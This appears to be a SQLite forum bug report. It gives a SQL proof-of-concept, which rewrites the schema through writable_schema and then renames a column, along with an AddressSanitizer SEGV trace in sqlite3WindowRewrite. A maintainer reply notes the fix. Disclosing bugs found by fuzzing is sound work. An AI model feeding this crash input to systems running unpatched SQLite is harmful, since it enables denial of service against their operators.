A testcase causing SEGV in sqlite3WindowRewrite
(1) By Jingzhou Fu (fuboat) on 2022-03-10 15:33:08
System Information:
compile-time options: CC=clang-12 ./configure --enable-debug (can also be triggered in the release version)
sqlite_source_id: 2022-03-10 11:48:16 4173819cd285a1c133645eda27b9f6dc5a2247eaa0c834bdc60058ef3109b102
PoC:
CREATE TABLE t7(x);
PRAGMA writable_schema=ON;
UPDATE sqlite_master SET sql='CREATE TABLE b AS SELECT
sum(a) OVER win,
min(a) OV FROM t1
WINDOW win AS (ORDER BY a)';
CREATE TABLE t1(a);
CREATE TABLE x(y);
ALTER TABLE x RENAME y TO sqlsim0;
output when ASAN is enabled:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==127348==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x556923fda076 bp 0x7ffecbb7acb0 sp 0x7ffecbb7ab30 T0)
==127348==The signal is caused by a READ memory access.
==127348==Hint: address points to the zero page.
#0 0x556923fda075 in sqlite3WindowRewrite /root/bld_debug_asan/sqlite3.c:159441
#1 0x556923f6655d in sqlite3Select /root/bld_debug_asan/sqlite3.c:140846
#2 0x556923eefc4c in sqlite3EndTable /root/bld_debug_asan/sqlite3.c:116949
#3 0x556923fe8906 in yy_reduce /root/bld_debug_asan/sqlite3.c:165153
#4 0x556923ff8368 in sqlite3Parser /root/bld_debug_asan/sqlite3.c:166761
#5 0x556923ffdc25 in sqlite3RunParser /root/bld_debug_asan/sqlite3.c:168059
#6 0x556923ecbbe4 in renameParseSql /root/bld_debug_asan/sqlite3.c:110177
#7 0x556923ed1b2b in renameTableTest /root/bld_debug_asan/sqlite3.c:111025
#8 0x556923e77826 in sqlite3VdbeExec /root/bld_debug_asan/sqlite3.c:95772
#9 0x556923e37ac1 in sqlite3Step /root/bld_debug_asan/sqlite3.c:85948
#10 0x556923e38305 in sqlite3_step /root/bld_debug_asan/sqlite3.c:86005
#11 0x556923d0852f in exec_prepared_stmt /root/bld_debug_asan/shell.c:14648
#12 0x556923d0a653 in shell_exec /root/bld_debug_asan/shell.c:14969
#13 0x556923d342c6 in runOneSqlLine /root/bld_debug_asan/shell.c:22502
#14 0x556923d34f8c in process_input /root/bld_debug_asan/shell.c:22630
#15 0x556923d38700 in main /root/bld_debug_asan/shell.c:23464
#16 0x7f6030a520b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
#17 0x556923ccc0ad in _start (/root/bin_debug_asan/usr/local/bin/sqlite3+0xd00ad)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/bld_debug_asan/sqlite3.c:159441 in sqlite3WindowRewrite
==127348==ABORTING
(2) By Richard Hipp (drh) on 2022-03-10 16:29:24 in reply to 1
Fixed by check-in 58de3c2b1a773a71.